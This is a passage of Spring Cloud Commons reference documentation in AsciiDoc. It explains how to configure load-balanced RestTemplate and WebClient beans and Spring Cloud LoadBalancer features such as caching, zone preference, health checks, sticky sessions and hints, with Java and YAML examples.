shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @LoadBalanced\n @Bean\n RestTemplate loadBalanced() {\n return new RestTemplate();\n }\n\n @Primary\n @Bean\n RestTemplate restTemplate() {\n return new RestTemplate();\n }\n}\n\npublic class MyClass {\n@Autowired\nprivate RestTemplate restTemplate;\n\n @Autowired\n @LoadBalanced\n private RestTemplate loadBalanced;\n\n public String doOtherStuff() {\n return loadBalanced.getForObject(\"http:\/\/stores\/stores\", String.class);\n }\n\n public String doStuff() {\n return restTemplate.getForObject(\"http:\/\/example.com\", String.class);\n }\n}\n----\n====\n\nIMPORTANT: Notice the use of the `@Primary` annotation on the plain `RestTemplate` declaration in the preceding example to disambiguate the unqualified `@Autowired` injection.\n\nTIP: If you see errors such as `java.lang.IllegalArgumentException: Can not set org.springframework.web.client.RestTemplate field com.my.app.Foo.restTemplate to com.sun.proxy.$Proxy89`, try injecting `RestOperations` or setting `spring.aop.proxyTargetClass=true`.\n\n=== Multiple WebClient Objects\n\nIf you want a `WebClient` that is not load-balanced, create a `WebClient` bean and inject it.\nTo access the load-balanced `WebClient`, use the `@LoadBalanced` qualifier when you create your `@Bean`, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @LoadBalanced\n @Bean\n WebClient.Builder loadBalanced() {\n return WebClient.builder();\n }\n\n @Primary\n @Bean\n WebClient.Builder webClient() {\n return WebClient.builder();\n }\n}\n\npublic class MyClass {\n @Autowired\n private WebClient.Builder webClientBuilder;\n\n @Autowired\n @LoadBalanced\n private WebClient.Builder loadBalanced;\n\n public Mono<String> doOtherStuff() {\n return loadBalanced.build().get().uri(\"http:\/\/stores\/stores\")\n \t\t\t\t.retrieve().bodyToMono(String.class);\n }\n\n public Mono<String> doStuff() {\n return webClientBuilder.build().get().uri(\"http:\/\/example.com\")\n \t\t\t\t.retrieve().bodyToMono(String.class);\n }\n}\n----\n====\n\n[[loadbalanced-webclient]]\n=== Spring WebFlux `WebClient` as a Load Balancer Client\n\nThe Spring WebFlux can work with both reactive and non-reactive `WebClient` configurations, as the topics describe:\n\n* <<webflux-with-reactive-loadbalancer>>\n* <<load-balancer-exchange-filter-functionload-balancer-exchange-filter-function>>\n\n[[webflux-with-reactive-loadbalancer]]\n==== Spring WebFlux `WebClient` with `ReactorLoadBalancerExchangeFilterFunction`\n\nYou can configure `WebClient` to use the `ReactiveLoadBalancer`.\nIf you add <<spring-cloud-loadbalancer-starter, Spring Cloud LoadBalancer starter>> to your project\nand if `spring-webflux` is on the classpath, `ReactorLoadBalancerExchangeFilterFunction` is auto-configured.\nThe following example shows how to configure a `WebClient` to use reactive load-balancer:\n\n====\n[source,java,indent=0]\n----\npublic class MyClass {\n @Autowired\n private ReactorLoadBalancerExchangeFilterFunction lbFunction;\n\n public Mono<String> doOtherStuff() {\n return WebClient.builder().baseUrl(\"http:\/\/stores\")\n .filter(lbFunction)\n .build()\n .get()\n .uri(\"\/stores\")\n .retrieve()\n .bodyToMono(String.class);\n }\n}\n----\n====\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe `ReactorLoadBalancer` is used to create a full physical address.\n\n[[load-balancer-exchange-filter-function]]\n==== Spring WebFlux `WebClient` with a Non-reactive Load Balancer Client\n\nIf `spring-webflux` is on the classpath, `LoadBalancerExchangeFilterFunction`\nis auto-configured. Note, however, that this\nuses a non-reactive client under the hood.\nThe following example shows how to configure a `WebClient` to use load-balancer:\n\n====\n[source,java,indent=0]\n----\npublic class MyClass {\n @Autowired\n private LoadBalancerExchangeFilterFunction lbFunction;\n\n public Mono<String> doOtherStuff() {\n return WebClient.builder().baseUrl(\"http:\/\/stores\")\n .filter(lbFunction)\n .build()\n .get()\n .uri(\"\/stores\")\n .retrieve()\n .bodyToMono(String.class);\n }\n}\n----\n====\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe `LoadBalancerClient` is used to create a full physical address.\n\nWARN: This approach is now deprecated.\nWe suggest that you use <<webflux-with-reactive-loadbalancer,WebFlux with reactive Load-Balancer>>\ninstead.\n\n[[ignore-network-interfaces]]\n=== Ignore Network Interfaces\n\nSometimes, it is useful to ignore certain named network interfaces so that they can be excluded from Service Discovery registration (for example, when running in a Docker container).\nA list of regular expressions can be set to cause the desired network interfaces to be ignored.\nThe following configuration ignores the `docker0` interface and all interfaces that start with `veth`:\n\n.application.yml\n====\n----\nspring:\n cloud:\n inetutils:\n ignoredInterfaces:\n - docker0\n - veth.*\n----\n====\n\nYou can also force the use of only specified network addresses by using a list of regular expressions, as the following example shows:\n\n.bootstrap.yml\n====\n----\nspring:\n cloud:\n inetutils:\n preferredNetworks:\n - 192.168\n - 10.0\n----\n====\n\nYou can also force the use of only site-local addresses, as the following example shows:\n\n.application.yml\n====\n----\nspring:\n cloud:\n inetutils:\n useOnlySiteLocalInterfaces: true\n----\n====\n\nSee https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/net\/Inet4Address.html#isSiteLocalAddress--[Inet4Address.html.isSiteLocalAddress()] for more details about what constitutes a site-local address.\n\n[[http-clients]]\n=== HTTP Client Factories\n\nSpring Cloud Commons provides beans for creating both Apache HTTP clients (`ApacheHttpClientFactory`) and OK HTTP clients (`OkHttpClientFactory`).\nThe `OkHttpClientFactory` bean is created only if the OK HTTP jar is on the classpath.\nIn addition, Spring Cloud Commons provides beans for creating the connection managers used by both clients: `ApacheHttpClientConnectionManagerFactory` for the Apache HTTP client and `OkHttpClientConnectionPoolFactory` for the OK HTTP client.\nIf you would like to customize how the HTTP clients are created in downstream projects, you can provide your own implementation of these beans.\nIn addition, if you provide a bean of type `HttpClientBuilder` or `OkHttpClient.Builder`, the default factories use these builders as the basis for the builders returned to downstream projects.\nYou can also disable the creation of these beans by setting `spring.cloud.httpclientfactories.apache.enabled` or `spring.cloud.httpclientfactories.ok.enabled` to `false`.\n\n[[enabled-features]]\n=== Enabled Features\n\nSpring Cloud Commons provides a `\/features` actuator endpoint.\nThis endpoint returns features available on the classpath and whether they are enabled.\nThe information returned includes the feature type, name, version, and vendor.\n\n==== Feature types\n\nThere are two types of 'features': abstract and named.\n\nAbstract features are features where an interface or abstract class is defined and that an implementation the creates, such as `DiscoveryClient`, `LoadBalancerClient`, or `LockService`.\nThe abstract class or interface is used to find a bean of that type in the context.\nThe version displayed is `bean.getClass().getPackage().getImplementationVersion()`.\n\nNamed features are features that do not have a particular class they implement. These features include \"`Circuit Breaker`\", \"`API Gateway`\", \"`Spring Cloud Bus`\", and others. These features require a name and a bean type.\n\n==== Declaring features\n\nAny module can declare any number of `HasFeature` beans, as the following examples show:\n\n====\n[source,java,indent=0]\n----\n@Bean\npublic HasFeatures commonsFeatures() {\n return HasFeatures.abstractFeatures(DiscoveryClient.class, LoadBalancerClient.class);\n}\n\n@Bean\npublic HasFeatures consulFeatures() {\n return HasFeatures.namedFeatures(\n new NamedFeature(\"Spring Cloud Bus\", ConsulBusAutoConfiguration.class),\n new NamedFeature(\"Circuit Breaker\", HystrixCommandAspect.class));\n}\n\n@Bean\nHasFeatures localFeatures() {\n return HasFeatures.builder()\n .abstractFeature(Something.class)\n .namedFeature(new NamedFeature(\"Some Other Feature\", Someother.class))\n .abstractFeature(Somethingelse.class)\n .build();\n}\n----\n====\n\nEach of these beans should go in an appropriately guarded `@Configuration`.\n\n\n=== Spring Cloud Compatibility Verification\n\nDue to the fact that some users have problem with setting up Spring Cloud application, we've decided\nto add a compatibility verification mechanism. It will break if your current setup is not compatible\nwith Spring Cloud requirements, together with a report, showing what exactly went wrong.\n\nAt the moment we verify which version of Spring Boot is added to your classpath.\n\nExample of a report\n\n====\n----\n***************************\nAPPLICATION FAILED TO START\n***************************\n\nDescription:\n\nYour project setup is incompatible with our requirements due to following reasons:\n\n- Spring Boot [2.1.0.RELEASE] is not compatible with this Spring Cloud release train\n\n\nAction:\n\nConsider applying the following actions:\n\n- Change Spring Boot version to one of the following versions [1.2.x, 1.3.x] .\nYou can find the latest Spring Boot versions here [https:\/\/spring.io\/projects\/spring-boot#learn].\nIf you want to learn more about the Spring Cloud Release train compatibility, you can visit this page [https:\/\/spring.io\/projects\/spring-cloud#overview] and check the [Release Trains] section.\n----\n====\n\nIn order to disable this feature, set `spring.cloud.compatibility-verifier.enabled` to `false`.\nIf you want to override the compatible Spring Boot versions, just set the\n`spring.cloud.compatibility-verifier.compatible-boot-versions` property with a comma separated list\nof compatible Spring Boot versions.\n\n== Spring Cloud LoadBalancer\n\nSpring Cloud provides its own client-side load-balancer abstraction and implementation. For the load-balancing\nmechanism, `ReactiveLoadBalancer` interface has been added and a *Round-Robin-based* and *Random* implementations\nhave been provided for it. In order to get instances to select from reactive `ServiceInstanceListSupplier`\nis used. Currently we support a service-discovery-based implementation of `ServiceInstanceListSupplier`\nthat retrieves available instances from Service Discovery using a <<discovery-client, Discovery Client>> available in the classpath.\n\nTIP: It is possible to disable Spring Cloud LoadBalancer by setting the value of `spring.cloud.loadbalancer.enabled` to `false`.\n\n=== Switching between the load-balancing algorithms\n\nThe `ReactiveLoadBalancer` implementation that is used by default is `RoundRobinLoadBalancer`. To switch to a different implementation, either for selected services or all of them, you can use the <<custom-loadbalancer-configuration, custom LoadBalancer configurations mechanism>>.\n\nFor example, the following configuration can be passed via `@LoadBalancerClient` annotation to switch to using the `RandomLoadBalancer`:\n\n[[random-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tReactorLoadBalancer<ServiceInstance> randomLoadBalancer(Environment environment,\n\t\t\tLoadBalancerClientFactory loadBalancerClientFactory) {\n\t\tString name = environment.getProperty(LoadBalancerClientFactory.PROPERTY_NAME);\n\t\treturn new RandomLoadBalancer(loadBalancerClientFactory\n\t\t\t\t.getLazyProvider(name, ServiceInstanceListSupplier.class),\n\t\t\t\tname);\n\t}\n}\n----\n\nNOTE: The classes you pass as `@LoadBalancerClient` or `@LoadBalancerClients` configuration arguments should either not be annotated with `@Configuration` or be outside component scan scope.\n\n=== Spring Cloud LoadBalancer integrations\n\nIn order to make it easy to use Spring Cloud LoadBalancer, we provide `ReactorLoadBalancerExchangeFilterFunction` that can be used with `WebClient` and `BlockingLoadBalancerClient` that works with `RestTemplate`.\nYou can see more information and examples of usage in the following sections:\n\n* <<rest-template-loadbalancer-client,Spring RestTemplate as a Load Balancer Client>>\n* <<webclinet-loadbalancer-client, Spring WebClient as a Load Balancer Client>>\n* <<webflux-with-reactive-loadbalancer,Spring WebFlux WebClient with `ReactorLoadBalancerExchangeFilterFunction`>>\n\n[[loadbalancer-caching]]\n=== Spring Cloud LoadBalancer Caching\n\nApart from the basic `ServiceInstanceListSupplier` implementation that retrieves instances via `DiscoveryClient` each time it has to choose an instance, we provide two caching implementations.\n\n==== https:\/\/github.com\/ben-manes\/caffeine[Caffeine]-backed LoadBalancer Cache Implementation\n\nIf you have `com.github.ben-manes.caffeine:caffeine` in the classpath, Caffeine-based implementation will be used.\nSee the <<loadbalancer-cache-configuration, LoadBalancerCacheConfiguration>> section for information on how to configure it.\n\nIf you are using Caffeine, you can also override the default Caffeine Cache setup for the LoadBalancer by passing your own https:\/\/static.javadoc.io\/com.github.ben-manes.caffeine\/caffeine\/2.2.2\/com\/github\/benmanes\/caffeine\/cache\/CaffeineSpec.html[Caffeine Specification]\nin the `spring.cloud.loadbalancer.cache.caffeine.spec` property.\n\nWARN: Passing your own Caffeine specification will override any other LoadBalancerCache settings, including <<loadbalancer-cache-configuration, General LoadBalancer Cache Configuration>> fields, such as `ttl` and `capacity`.\n\n==== Default LoadBalancer Cache Implementation\n\nIf you do not have Caffeine in the classpath, the `DefaultLoadBalancerCache`, which comes automatically with `spring-cloud-starter-loadbalancer`, will be used.\nSee the <<loadbalancer-cache-configuration, LoadBalancerCacheConfiguration>> section for information on how to configure it.\n\nTIP: To use Caffeine instead of the default cache, add the `com.github.ben-manes.caffeine:caffeine` dependency to classpath.\n\n[[loadbalancer-cache-configuration]]\n==== LoadBalancer Cache Configuration\n\nYou can set your own `ttl` value (the time after write after which entries should be expired), expressed as `Duration`, by passing a `String` compliant with the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/spring-boot-features.html#boot-features-external-config-conversion-duration[Spring Boot `String` to `Duration` converter syntax].\nas the value of the `spring.cloud.loadbalancer.cache.ttl` property.\nYou can also set your own LoadBalancer cache initial capacity by setting the value of the `spring.cloud.loadbalancer.cache.capacity` property.\n\nThe default setup includes `ttl` set to 35 seconds and the default `initialCapacity` is `256`.\n\nYou can also altogether disable loadBalancer caching by setting the value of `spring.cloud.loadbalancer.cache.enabled`\nto `false`.\n\nWARNING: Although the basic, non-cached, implementation is useful for prototyping and testing, it's much less efficient than the cached versions, so we recommend always using the cached version in production. If the caching is already done by the `DiscoveryClient` implementation, for example `EurekaDiscoveryClient`, the load-balancer caching should be disabled to prevent double caching.\n\n=== Zone-Based Load-Balancing\n\nTo enable zone-based load-balancing, we provide the `ZonePreferenceServiceInstanceListSupplier`.\nWe use `DiscoveryClient`-specific `zone` configuration (for example, `eureka.instance.metadata-map.zone`) to pick the zone that the client tries to filter available service instances for.\n\nNOTE: You can also override `DiscoveryClient`-specific zone setup by setting the value of `spring.cloud.loadbalancer.zone` property.\n\nWARNING: For the time being, only Eureka Discovery Client is instrumented to set the LoadBalancer zone. For other discovery client, set the `spring.cloud.loadbalancer.zone` property. More instrumentations coming shortly.\n\nNOTE: To determine the zone of a retrieved `ServiceInstance`, we check the value under the `\"zone\"` key in its metadata map.\n\nThe `ZonePreferenceServiceInstanceListSupplier` filters retrieved instances and only returns the ones within the same zone.\nIf the zone is `null` or there are no instances within the same zone, it returns all the retrieved instances.\n\nIn order to use the zone-based load-balancing approach, you will have to instantiate a `ZonePreferenceServiceInstanceListSupplier` bean in a <<custom-loadbalancer-configuration,custom configuration>>.\n\nWe use delegates to work with `ServiceInstanceListSupplier` beans.\nWe suggest passing a `DiscoveryClientServiceInstanceListSupplier` delegate in the constructor of `ZonePreferenceServiceInstanceListSupplier` and, in turn, wrapping the latter with a `CachingServiceInstanceListSupplier` to leverage <<loadbalancer-caching, LoadBalancer caching mechanism>>.\n\nYou could use this sample configuration to set it up:\n\n[[zoned-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withZonePreference()\n\t\t\t\t\t.withCaching()\n\t\t\t\t\t.build(context);\n\t}\n}\n----\n\n=== Instance Health-Check for LoadBalancer\n\nIt is possible to enable a scheduled HealthCheck for the LoadBalancer. The `HealthCheckServiceInstanceListSupplier`\nis provided for that. It regularly verifies if the instances provided by a delegate\n`ServiceInstanceListSupplier` are still alive and only returns the healthy instances,\nunless there are none - then it returns all the retrieved instances.\n\nTIP: This mechanism is particularly helpful while using the `SimpleDiscoveryClient`. For the\nclients backed by an actual Service Registry, it's not necessary to use, as we already get\nhealthy instances after querying the external ServiceDiscovery.\n\nTIP: This supplier is also recommended for setups with a small number of instances per service\nin order to avoid retrying calls on a failing instance.\n\nWARNING: If using any of the Service Discovery-backed suppliers, adding this health-check mechanism is usually not necessary, as we retrieve the health state of the instances directly\nfrom the Service Registry.\n\nTIP: The `HealthCheckServiceInstanceListSupplier` relies on having updated instances provided by a delegate flux. In the rare cases when you want to use a delegate that does not refresh the instances, even though the list of instances may change (such as the `ReactiveDiscoveryClientServiceInstanceListSupplier` provided by us), you can set `spring.cloud.loadbalancer.health-check.refetch-instances` to `true` to have the instance list refreshed by the `HealthCheckServiceInstanceListSupplier`. You can then also adjust the refretch intervals by modifying the value of `spring.cloud.loadbalancer.health-check.refetch-instances-interval` and opt to disable the additional healthcheck repetitions by setting `spring.cloud.loadbalancer.repeat-health-check` to `false` as every instances refetch\n will also trigger a healthcheck.\n\n`HealthCheckServiceInstanceListSupplier` uses properties prefixed with\n`spring.cloud.loadbalancer.health-check`. You can set the `initialDelay` and `interval`\nfor the scheduler. You can set the default path for the healthcheck URL by setting\nthe value of the `spring.cloud.loadbalancer.health-check.path.default` property. You can also set a specific value for any given service by setting the value of the `spring.cloud.loadbalancer.health-check.path.[SERVICE_ID]` property, substituting `[SERVICE_ID]` with the correct ID of your service. If the path is not set, `\/actuator\/health` is used by default.\n\nTIP: If you rely on the default path (`\/actuator\/health`), make sure you add `spring-boot-starter-actuator` to your collaborator's dependencies, unless you are planning to add such an endpoint on your own.\n\nIn order to use the health-check scheduler approach, you will have to instantiate a `HealthCheckServiceInstanceListSupplier` bean in a <<custom-loadbalancer-configuration,custom configuration>>.\n\nWe use delegates to work with `ServiceInstanceListSupplier` beans.\nWe suggest passing a `DiscoveryClientServiceInstanceListSupplier` delegate in the constructor of `HealthCheckServiceInstanceListSupplier`.\n\nYou could use this sample configuration to set it up:\n\n[[health-check-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withHealthChecks()\n\t\t\t\t\t.build(context);\n\t }\n\t}\n----\n\nTIP: For the non-reactive stack, create this supplier with the `withBlockingHealthChecks()`.\nYou can also pass your own `WebClient` or `RestTemplate` instance to be used for the checks.\n\nWARNING: `HealthCheckServiceInstanceListSupplier` has its own caching mechanism based on Reactor Flux `replay()`. Therefore, if it's being used, you may want to skip wrapping that supplier with `CachingServiceInstanceListSupplier`.\n\n=== Same instance preference for LoadBalancer\n\nYou can set up the LoadBalancer in such a way that it prefers the instance that was previously selected, if that instance is available.\n\nFor that, you need to use `SameInstancePreferenceServiceInstanceListSupplier`. You can configure it either by setting the value of `spring.cloud.loadbalancer.configurations` to `same-instance-preference` or by providing your own `ServiceInstanceListSupplier` bean -- for example:\n\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withSameInstancePreference()\n\t\t\t\t\t.build(context);\n\t }\n\t}\n----\n\nTIP: This is also a replacement for Zookeeper `StickyRule`.\n\n=== Request-based Sticky Session for LoadBalancer\n\nYou can set up the LoadBalancer in such a way that it prefers the instance with `instanceId` provided in a request cookie. We currently support this if the request is being passed to the LoadBalancer through either `ClientRequestContext` or `ServerHttpRequestContext`, which are used by the SC LoadBalancer exchange filter functions and filters.\n\nFor that, you need to use the `RequestBasedStickySessionServiceInstanceListSupplier`. You can configure it either by setting the value of `spring.cloud.loadbalancer.configurations` to `request-based-sticky-session` or by providing your own `ServiceInstanceListSupplier` bean -- for example:\n\n[[health-check-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withRequestBasedStickySession()\n\t\t\t\t\t.build(context);\n\t }\n\t}\n----\n\nFor that functionality, it is useful to have the selected service instance (which can be different from the one in the original request cookie if that one is not available) to be updated before sending the request forward. To do that, set the value of `spring.cloud.loadbalancer.sticky-session.add-service-instance-cookie` to `true`.\n\nBy default, the name of the cookie is `sc-lb-instance-id`. You can modify it by changing the value of the `spring.cloud.loadbalancer.instance-id-cookie-name` property.\n\nNOTE: This feature is currently supported for WebClient-backed load-balancing.\n\n[[spring-cloud-loadbalancer-hints]]\n=== Spring Cloud LoadBalancer Hints\n\nSpring Cloud LoadBalancer lets you set `String` hints that are passed to the LoadBalancer within the `Request` object and that can later be used in `ReactiveLoadBalancer` implementations that can handle them.\n\nYou can set a default hint for all services by setting the value of the `spring.cloud.loadbalancer.hint.default` property. You can also set a specific value\nfor any given service by setting the value of the `spring.cloud.loadbalancer.hint.[SERVICE_ID]` property, substituting `[SERVICE_ID]` with the correct ID of your service. If the hint is not set by the user, `default` is used.\n\n[[hints-based-loadbalancing]]\n=== Hint-Based Load-Balancing\n\nWe also provide a `HintBasedServiceInstanceListSupplier`, which is a `ServiceInstanceListSupplier` implementation for hint-based instance selection.\n\n`HintBasedServiceInstanceListSupplier` checks for a hint request header (the default header-name is `X-SC-LB-Hint`, but you can modify it by changing the value of the `spring.cloud.loadbalancer.hint-header-name` property) and, if it finds a hint request header, uses the hint value passed in the header to filter service instances.\n\nIf no hint header has been added, `HintBasedServiceInstanceListSupplier` uses <<spring-cloud-loadbalancer-hints,hint values from properties>> to filter service instances.\n\nIf no hint is set, either by the header or by properties, all service instances provided by the delegate are returned.\n\nWhile filtering, `HintBasedServiceInstanceListSupplier` looks for service instances that have a matching value set under the `hint` key in their `metadataMap`. If no matching instances are found, all instances provided by the delegate are returned.\n\nYou could use the following sample configuration to set it up:\n\n[[hints-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withHints()\n\t\t\t\t\t.withCaching()\n\t\t\t\t\t.build(context);\n\t}\n}\n----\n\n=== Transform the load-balanced HTTP request\n\nYou can use the selected `ServiceInstance` to transform the load-balanced HTTP Request.\n\nFor `RestTemplate`, you need to implement and define `LoadBalancerRequestTransformer` as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic LoadBalancerRequestTransformer transformer() {\n\t\treturn new LoadBalancerRequestTransformer() {\n\t\t\t@Override\n\t\t\tpublic HttpRequest transformRequest(HttpRequest request, ServiceInstance instance) {\n\t\t\t\treturn new HttpRequestWrapper(request) {\n\t\t\t\t\t@Override\n\t\t\t\t\tpublic HttpHeaders getHeaders() {\n\t\t\t\t\t\tHttpHeaders headers = new HttpHeaders();\n\t\t\t\t\t\theaders.putAll(super.getHeaders());\n\t\t\t\t\t\theaders.add(\"X-InstanceId\", instance.getInstanceId());\n\t\t\t\t\t\treturn headers;\n\t\t\t\t\t}\n\t\t\t\t};\n\t\t\t}\n\t\t};\n\t}\n----\n\nFor `WebClient`, you need to implement and define `LoadBalancerClientRequestTransformer` as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic LoadBalancerClientRequestTransformer transformer() {\n\t\treturn new LoadBalancerClientRequestTransformer() {\n\t\t\t@Override\n\t\t\tpublic ClientRequest transformRequest(ClientRequest request, ServiceInstance instance) {\n\t\t\t\treturn ClientRequest.from(request)\n\t\t\t\t\t\t.header(\"X-InstanceId\", instance.getInstanceId())\n\t\t\t\t\t\t.build();\n\t\t\t}\n\t\t};\n\t}\n----\n\nIf multiple transformers are defined, they are applied in the order in which Beans are defined.\nAlternatively, you can use `LoadBalancerRequestTransformer.DEFAULT_ORDER` or `LoadBalancerClientRequestTransformer.DEFAULT_ORDER` to specify the order.\n\n[[spring-cloud-loadbalancer-starter]]\n=== Spring Cloud LoadBalancer Starter\n\nWe also provide a starter that allows you to easily add Spring Cloud LoadBalancer in a Spring Boot app.\nIn order to use it, just add `org.springframework.cloud:spring-cloud-starter-loadbalancer` to your Spring Cloud dependencies in your build file.\n\nNOTE: Spring Cloud LoadBalancer starter includes\nhttps:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-caching.html[Spring Boot Caching]\nand https:\/\/github.com\/stoyanr\/Evictor[Evictor].\n\n[[custom-loadbalancer-configuration]]\n=== Passing Your Own Spring Cloud LoadBalancer Configuration\n\nYou can also use the `@LoadBalancerClient` annotation to pass your own load-balancer client configuration, passing the name of the load-balancer client and the configuration class, as follows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\n@LoadBalancerClient(value = \"stores\", configuration = CustomLoadBalancerConfiguration.class)\npublic class MyConfiguration {\n\n\t@Bean\n\t@LoadBalanced\n\tpublic WebClient.Builder loadBalancedWebClientBuilder() {\n\t\treturn WebClient.builder();\n\t}\n}\n----\n\nTIP:: In order to make working on your own LoadBalancer configuration easier, we have added a `builder()` method to the `ServiceInstanceListSupplier` class.\n\nTIP:: You can also use our alternative predefined configurations in place of the default ones by setting the value of `spring.cloud.loadbalancer.configurations` property to `zone-preference` to use `ZonePreferenceServiceInstanceListSupplier` with caching or to `health-check` to use `HealthCheckServiceInstanceListSupplier` with caching.\n====\n\nYou can use this feature to instantiate different implementations of `ServiceInstanceListSupplier` or `ReactorLoadBalancer`, either written by you, or provided by us as alternatives (for example `ZonePreferenceServiceInstanceListSupplier`) to override the default setup.\n\nYou can see an example of a custom configuration <<zoned-based-custom-loadbalancer-configuration,here>>.\n\nNOTE: The annotation `value` arguments (`stores` in the example above) specifies the service id of the service that we should send the requests to with the given custom configuration.\n\nYou can also pass multiple configurations (for more than one load-balancer client) through the `@LoadBalancerClients` annotation, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\n@LoadBalancerClients({@LoadBalancerClient(value = \"stores\", configuration = StoresLoadBalancerClientConfiguration.class), @LoadBalancerClient(value = \"customers\", configuration = CustomersLoadBalancerClientConfiguration.class)})\npublic class MyConfiguration {\n\n\t@Bean\n\t@LoadBalanced\n\tpublic WebClient.Builder loadBalancedWebClientBuilder() {\n\t\treturn WebClient.builder();\n\t}\n}\n----\n\nNOTE: The classes you pass as `@LoadBalancerClient` or `@LoadBalancerClients` configuration arguments should either not be annotated with `@Configuration` or be outside component scan scope.\n\n====\n\n[[loadbalancer-lifecycle]]\n=== Spring Cloud LoadBalancer Lifecycle\n\nOne type of bean that it may be useful to register using <<custom-loadbalancer-configuration,Custom LoadBalancer configuration>> is `LoadBalancerLifecycle`.\n\nThe `LoadBalancerLifecycle` beans provide callback methods, named `onStart(Request<RC> request)`, `onStartRequest(Request<RC> request, Response<T> lbResponse)` and `onComplete(CompletionContext<RES, T, RC> completionContext)`, that you should implement to specify what actions should take place before and after load-balancing.\n\n`onStart(Request<RC> request)` takes a `Request` object as a parameter. It contains data that is used to select an appropriate instance, including the downstream client request and <<spring-cloud-loadbalancer-hints,hint>>. `onStartRequest` also takes the `Request` object and, additionally, the `Response<T>` object as parameters. On the other hand, a `CompletionContext` object is provided to the `onComplete(CompletionContext<RES, T, RC> completionContext)` method. It contains the LoadBalancer `Response`, including the selected service instance, the `Status` of the request executed against that service instance and (if available) the response returned to the downstream client, and (if an exception has occurred) the corresponding `Throwable`.\n\nThe `supports(Class requestContextClass, Class responseClass,\nClass serverTypeClass)` method can be used to determine whether the processor in question handles objects of provided types. If not overridden by the user, it returns `true`.\n\nNOTE: In the preceding method calls, `RC` means `RequestContext` type, `RES` means client response type, and `T` means returned server type.\n\n[[loadbalancer-micrometer-stats-lifecycle]]\n=== Spring Cloud LoadBalancer Statistics\n\nWe provide a `LoadBalancerLifecycle` bean called `MicrometerStatsLoadBalancerLifecycle`, which uses Micrometer to provide statistics for load-balanced calls.\n\nIn order to get this bean added to your application context,\nset the value of the `spring.cloud.loadbalancer.stats.micrometer.enabled` to `true` and have a `MeterRegistry` available (for example, by adding https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/production-ready-features.html[Spring Boot Actuator] to your project).\n\n`MicrometerStatsLoadBalancerLifecycle` registers the following meters in `MeterRegistry`:\n\n* `loadbalancer.requests.active`: A gauge that allows you to monitor the number of currently active requests for any service instance (service instance data available via tags);\n* `loadbalancer.requests.success`: A timer that measures the time of execution of any load-balanced requests that have ended in passing a response on to the underlying client;\n* `loadbalancer.requests.failed`: A timer that measures the time of execution of any load-balanced requests that have ended with an exception;\n* `loadbalancer.requests.discard`: A counter that measures the number of discarded load-balanced requests, i.e. requests where a service instance to run the request on has not been retrieved by the LoadBalancer.\n\nAdditional information regarding the service instances, request data, and response data is added to metrics via tags whenever available.\n\nNOTE: For some implementations, such as `BlockingLoadBalancerClient`, request and response data might not be available, as we establish generic types from arguments and might not be able to determine the types and read the data.\n\nNOTE: The meters are registered in the registry when at least one record is added for a given meter.\n\nTIP: You can further configure the behavior of those metrics (for example, add https:\/\/micrometer.io\/docs\/concepts#_histograms_and_percentiles[publishing percentiles and histograms]) by https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/production-ready-features.html#production-ready-metrics-per-meter-properties[adding `MeterFilters`].\n\n== Spring Cloud Circuit Breaker\n\ninclude::spring-cloud-circuitbreaker.adoc[leveloffset=+1]\n\n== CachedRandomPropertySource\n\nSpring Cloud Context provides a `PropertySource` that caches random values based on a key. Outside of the caching\nfunctionality it works the same as Spring Boot's https:\/\/github.com\/spring-projects\/spring-boot\/blob\/main\/spring-boot-project\/spring-boot\/src\/main\/java\/org\/springframework\/boot\/env\/RandomValuePropertySource.java[`RandomValuePropertySource`].\nThis random value might be useful in the case where you want a random value that is consistent even after the Spring Application\ncontext restarts. The property value takes the form of `cachedrandom.[yourkey].[type]` where `yourkey` is the key in the cache. The `type` value can\nbe any type supported by Spring Boot's 